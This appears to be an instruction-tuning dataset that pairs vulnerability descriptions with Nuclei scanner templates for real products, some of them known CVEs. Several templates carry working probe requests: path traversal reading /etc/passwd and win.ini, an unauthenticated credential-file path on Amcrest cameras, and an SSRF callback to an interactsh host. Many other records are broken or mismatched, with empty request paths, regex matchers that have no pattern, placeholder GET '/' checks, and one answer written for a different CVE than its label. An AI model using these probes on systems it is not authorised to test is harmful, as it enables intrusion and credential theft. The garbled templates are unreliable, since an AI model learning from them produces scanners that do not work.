+{"instruction": "Generate a Nuclei template for CVE-2017-8229", "input": "Title: Vulnerability (CWE-255) in amcrest ipm-721s_firmware\nSummary: Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials. If the firmware version V2.420.AC00.16.R 9/9/2016 is dissected using binwalk tool, one obtains a _user-x.squashfs.img.extracted archive which contains the filesystem set up on the device that many of the binaries in the /usr folder. The binary \"sonia\" is the one that has the vulnerable function that sets up the default credentials on the device. If one opens this binary in IDA-pro one will notice that this follows a ARM little endian format. The function sub_436D6 in IDA pro is identified to be setting up the configuration for the device. If one scrolls to the address 0x000437C2 then one can see that /current_config is being set as an ALIAS for /mnt/mtd/Config folder on the device. If one TELNETs into the device and navigates to /mnt/mtd/Config folder, one can observe that it contains various files such as Account1, Account2, SHAACcount1, etc. This means that if one navigates to http://[IPofcamera]/current_config/Sha1Account1 then one should be able to view the content of the files. The security researchers assumed that this was only possible only after authentication to the device. However, when unauthenticated access tests were performed for the same URL as provided above, it was observed that the device file could be downloaded without any authentication.\nVulnerability Type: Vulnerability (CWE-255)\nSeverity: critical\nAffected Products: amcrest ipm-721s_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-8229\n\ninfo:\n name: Amcrest IP Camera Web Management - Data Exposure\n author: pussycat0x\n severity: critical\n description: Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n tags: cve2017,cve,packetstorm,seclists,amcrest,iot,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/Sha1Account1\" \n matchers:\n - type: word\n words:\n - \"DevInformation\" \n - \"SerialID\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-8229"}
+{"instruction": "Generate a Nuclei template for: Cross DB Ownership Chaining Enabled in SQL Server Database Instances", "input": "Title: Cross DB Ownership Chaining Enabled in SQL Server Database Instances\nSummary: Cross DB Ownership Chaining Enabled in SQL Server Database Instances. Ensure that the \"cross db ownership chaining\" database flag is disabled for your Google Cloud SQL Server database instances. This flag, when enabled, can potentially introduce security risks by allowing cross-database access without explicit permissions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-sql-cross-db-ownership-chaining-enabled\n\ninfo:\n name: Cross DB Ownership Chaining Enabled in SQL Server Database Instances\n author: princechaddha\n severity: medium\n description: Ensure that the \"cross db ownership chaining\" database flag is disabled for your Google Cloud SQL Server database instances. This flag, when enabled, can potentially introduce security risks by allowing cross-database access without explicit permissions.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,sqlserver,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-sql-cross-db-ownership-chaining-enabled"}
+{"instruction": "Generate a Nuclei template for: Maximum Password Age Set Too High or Unlimited", "input": "Title: Maximum Password Age Set Too High or Unlimited\nSummary: Maximum Password Age Set Too High or Unlimited. Checks if the maximum password age allows passwords to be used indefinitely.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: max-password-age-too-high\n\ninfo:\n name: Maximum Password Age Set Too High or Unlimited\n author: princechaddha\n severity: medium\n description: Checks if the maximum password age allows passwords to be used indefinitely.\n tags: policy,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "max-password-age-too-high"}
+{"instruction": "Generate a Nuclei template for CVE-2015-3648", "input": "Title: Path Traversal in montala resourcespace\nSummary: Directory traversal vulnerability in pages/setup.php in Montala Limited ResourceSpace before 7.2.6727 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the defaultlanguage parameter.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: montala resourcespace\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-3648\n\ninfo:\n name: ResourceSpace - Local File inclusion\n author: pikpikcu\n severity: high\n description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.\n tags: cve2015,cve,lfi,resourcespace,packetstorm,montala,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2015-3648"}
+{"instruction": "Generate a Nuclei template for CVE-2023-28662", "input": "Title: SQL Injection in codemenschen gift_vouchers\nSummary: The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: codemenschen gift_vouchers\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-28662\n\ninfo:\n name: Wordpress Gift Cards <= 4.3.1 - SQL Injection\n author: xxcdd\n severity: critical\n description: The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\n tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Gift Vouchers and Packages\" \n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-28662"}
+{"instruction": "Generate a Nuclei template for: Google Speed Limit API Test", "input": "Title: Google Speed Limit API Test\nSummary: Google Speed Limit API Test. Tags: token-spray, google, speed\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googlespeedlimit\n\ninfo:\n name: Google Speed Limit API Test\n author: zzeitlin\n severity: info\n description: Google Speed Limit API Test\n tags: token-spray,google,speed,limit\n\nhttp:\n - method: GET\n path:\n - \"https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}\" \n matchers:\n - type: word\n words:\n - \"error\" \n part: body", "category": "generic", "severity": "info", "id": "api-googlespeedlimit"}
+{"instruction": "Generate a Nuclei template for CVE-2024-6928", "input": "Title: SQL Injection in opti.marketing opti_marketing\nSummary: The Opti Marketing WordPress plugin through 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: opti.marketing opti_marketing\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6928\n\ninfo:\n name: Opti Marketing <= 2.0.9 - SQL Injection\n author: s4e-io\n severity: high\n description: The Opti Marketing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-6928"}
+{"instruction": "Generate a Nuclei template for: Azure Redis Cache TLS Version Not Latest", "input": "Title: Azure Redis Cache TLS Version Not Latest\nSummary: Azure Redis Cache TLS Version Not Latest. Ensure that all your Microsoft Azure Redis Cache servers are using the latest available version of TLS encryption protocol in order to enhance the security of the SSL/TLS connection between the cache servers and their web applications, and comply with the industry standards.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-redis-tls-version-outdated\n\ninfo:\n name: Azure Redis Cache TLS Version Not Latest\n author: princechaddha\n severity: medium\n description: Ensure that all your Microsoft Azure Redis Cache servers are using the latest available version of TLS encryption protocol in order to enhance the security of the SSL/TLS connection between the cache servers and their web applications, and comply with the industry standards.\n tags: cloud,devops,azure,microsoft,redis,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-redis-tls-version-outdated"}
+{"instruction": "Generate a Nuclei template for CVE-2024-42640", "input": "Title: Unrestricted File Upload in CVE-2024-42640\nSummary: angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-42640\n\ninfo:\n name: Angular-Base64-Upload - Remote Code Execution\n author: s4e-io\n severity: critical\n description: angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n tags: cve,cve2024,angular,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-42640"}
+{"instruction": "Generate a Nuclei template for CVE-2019-12593", "input": "Title: Path Traversal in icewarp mail_server\nSummary: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: icewarp mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-12593\n\ninfo:\n name: IceWarp Mail Server <=10.4.4 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n tags: cve,cve2019,packetstorm,lfi,icewarp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini\" \n - \"{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd\" \n matchers:\n - type: word\n words:\n - \"[intl]\" \n - \"root:x:0\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-12593"}
+{"instruction": "Generate a Nuclei template for: GitList Security Checks", "input": "Title: GitList Security Checks\nSummary: GitList Security Checks. A simple workflow that runs all GitList related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gitlist-workflow\n\ninfo:\n name: GitList Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all GitList related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "gitlist-workflow"}
+{"instruction": "Generate a Nuclei template for CVE-2023-31446", "input": "Title: Vulnerability (CWE-77) in cassianetworks xc1000_firmware and others\nSummary: In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: cassianetworks xc1000_firmware, cassianetworks xc2000_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-31446\n\ninfo:\n name: Cassia Gateway Firmware - Remote Code Execution\n author: DhiyaneshDk\n severity: critical\n description: In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex", "category": "cve", "severity": "critical", "id": "CVE-2023-31446"}
+{"instruction": "Generate a Nuclei template for: CloudTrail Logs Not Encrypted", "input": "Title: CloudTrail Logs Not Encrypted\nSummary: CloudTrail Logs Not Encrypted. Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: cloudtrail-logs-not-encrypted\n\ninfo:\n name: CloudTrail Logs Not Encrypted\n author: princechaddha\n severity: medium\n description: Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data.\n tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "cloudtrail-logs-not-encrypted"}
+{"instruction": "Generate a Nuclei template for: Suprema BioStar 2 Panel - Detect", "input": "Title: Suprema BioStar 2 Panel - Detect\nSummary: Suprema BioStar 2 Panel - Detect. Tags: panel, login, biostar\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: suprema-biostar-panel\n\ninfo:\n name: Suprema BioStar 2 Panel - Detect\n author: ritikchaddha\n severity: info\n description: Suprema BioStar 2 Panel - Detect\n tags: panel,login,biostar,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/#/login\" \n matchers:\n - type: word\n words:\n - \"BioStar 2\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "suprema-biostar-panel"}
+{"instruction": "Generate a Nuclei template for: Apache ActiveMQ Artemis Console Default Login", "input": "Title: Apache ActiveMQ Artemis Console Default Login\nSummary: Apache ActiveMQ Artemis Console Default Login. Apache ActiveMQ Artemis console default login credentials were discovered.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: activemq-artemis-default-login\n\ninfo:\n name: Apache ActiveMQ Artemis Console Default Login\n author: pdteam\n severity: high\n description: Apache ActiveMQ Artemis console default login credentials were discovered.\n tags: apache,activemq,artemis,default-login,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/console/auth/login\" \n matchers:\n - type: word\n words:\n - \"{\"credentials\"\"", "category": "generic", "severity": "high", "id": "activemq-artemis-default-login"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: content-scheme\n\ninfo:\n name: Android Content Scheme - Detect\n author: gaurang\n severity: info\n description: Android content scheme enabling was detected.\n tags: android,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: SMB - Enumeration", "input": "Title: SMB - Enumeration\nSummary: SMB - Enumeration. SMS Information Extraction is a sophisticated and efficient system designed to retrieve critical information from a remote computer or device through short text messages. This technology enables users to remotely access essential details about a computer, such as its operating system (OS) version, computer name, and hostname,\nall via SMS communication.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: smb-enum\n\ninfo:\n name: SMB - Enumeration\n author: pussycat0x\n severity: info\n description: SMS Information Extraction is a sophisticated and efficient system designed to retrieve critical information from a remote computer or device through short text messages. This technology enables users to remotely access essential details about a computer, such as its operating system (OS) version, computer name, and hostname,\nall via SMS communication.\n tags: js,network,smb,enum,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "smb-enum"}
+{"instruction": "Generate a Nuclei template for: macOS World-Readable TTY Devices", "input": "Title: macOS World-Readable TTY Devices\nSummary: macOS World-Readable TTY Devices. Checks if TTY devices are readable by all users, potentially allowing session snooping.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: insecure-tty-permissions\n\ninfo:\n name: macOS World-Readable TTY Devices\n author: geeknik\n severity: medium\n description: Checks if TTY devices are readable by all users, potentially allowing session snooping.\n tags: macos,audit,local,security,tty\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "insecure-tty-permissions"}
+{"instruction": "Generate a Nuclei template for: Detect .dockercfg", "input": "Title: Detect .dockercfg\nSummary: Detect .dockercfg. Docker registry authentication data\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: dockercfg-config\n\ninfo:\n name: Detect .dockercfg\n author: geeknik\n severity: high\n description: Docker registry authentication data\n tags: docker,exposure,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.dockercfg\" \n - \"{{BaseURL}}/.docker/config.json\" \n matchers:\n - type: word\n words:\n - \"\"email\":\" \n - \"\"auth\":\" \n condition: and\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "dockercfg-config"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Taobao Suggest", "input": "Title: Content-Security-Policy Bypass - Taobao Suggest\nSummary: Content-Security-Policy Bypass - Taobao Suggest. Tags: xss, csp-bypass, taobao-suggest\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: taobao-suggest-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Taobao Suggest\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Taobao Suggest\n tags: xss,csp-bypass,taobao-suggest,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"taobao.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "taobao-suggest-csp-bypass"}
+{"instruction": "Generate a Nuclei template for CVE-2012-4940", "input": "Title: Path Traversal in gecad axigen_free_mail_server\nSummary: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: gecad axigen_free_mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2012-4940\n\ninfo:\n name: Axigen Mail Server Filename Directory Traversal\n author: dhiyaneshDk\n severity: medium\n description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.\n tags: cve,cve2012,edb,axigen,lfi,mail,gecad,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini\" \n - \"{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini\" \n matchers:\n - type: word\n words:\n - \"bit app support\" \n - \"fonts\" \n - \"extensions\" \n part: body\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2012-4940"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: livemasterru\n\ninfo:\n name: Livemaster.ru User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Livemaster.ru user name information check was conducted.\n tags: osint,osint-shopping,livemasterru,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.livemaster.ru/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\u041c\u0430\u0433\u0430\u0437\u0438\u043d \u043c\u0430\u0441\u0442\u0435\u0440\u0430\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Hikvison iVMS - File Upload Bypass", "input": "Title: Hikvison iVMS - File Upload Bypass\nSummary: Hikvison iVMS - File Upload Bypass. Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the \"/resourceOperations/upload\" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: hikvision-ivms-file-upload-bypass\n\ninfo:\n name: Hikvison iVMS - File Upload Bypass\n author: SleepingBag945\n severity: critical\n description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the \"/resourceOperations/upload\" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.\n tags: hikvision,ivms,intrusive,fileupload,auth-bypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\":true\" \n - \"\"resourceName\":\" \n part: body\n condition: and", "category": "generic", "severity": "critical", "id": "hikvision-ivms-file-upload-bypass"}
+{"instruction": "Generate a Nuclei template for CVE-2024-50334", "input": "Title: Vulnerability (CWE-288) in erudika scoold\nSummary: Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type: application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.\nVulnerability Type: Vulnerability (CWE-288)\nSeverity: medium\nAffected Products: erudika scoold\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-50334\n\ninfo:\n name: Scoold < 1.64.0 - Authentication Bypass\n author: xbow,iamnoooob,pdresearch\n severity: medium\n description: Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type- application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.\n tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-50334"}
+{"instruction": "Generate a Nuclei template for CVE-2024-29030", "input": "Title: Vulnerability (CWE-918) in usememos memos\nSummary: memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /api/resource that allows authenticated users to enumerate the internal network. Version 0.22.0 of memos removes the vulnerable file.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: usememos memos\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-29030\n\ninfo:\n name: Memos 0.13.2 - Server-Side Request Forgery\n author: ritikchaddha\n severity: medium\n description: An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.\n tags: cve,cve2024,xss,memos,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/o/get/resource?url=https://{{interactsh-url}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-29030"}
+{"instruction": "Generate a Nuclei template for CVE-2023-37979", "input": "Title: Cross-Site Scripting (XSS) in ninjaforms ninja_forms\nSummary: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <=\u00a03.6.25 versions.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: ninjaforms ninja_forms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-37979\n\ninfo:\n name: Ninja Forms < 3.6.26 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-37979"}
+{"instruction": "Generate a Nuclei template for CVE-2023-2796", "input": "Title: Missing Authorization in myeventon eventon\nSummary: The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\nVulnerability Type: Missing Authorization\nSeverity: medium\nAffected Products: myeventon eventon\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-0235\n\ninfo:\n name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure\n author: ProjectDiscoveryAI\n severity: medium\n description: The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users\" \n matchers:\n - type: word\n words:\n - \"@\" \n - \"status\":\"good\" \n - \"value=\" \n - \"\"content\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-2796"}
+{"instruction": "Generate a Nuclei template for CVE-2022-42889", "input": "Title: Code Injection in apache commons_text and others\nSummary: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: apache commons_text, netapp bluexp, juniper security_threat_response_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-42889\n\ninfo:\n name: Text4Shell - Remote Code Execution\n author: mordavid,princechaddha\n severity: critical\n description: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n tags: cve,cve2022,rce,oast,text4shell,dast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2022-42889"}
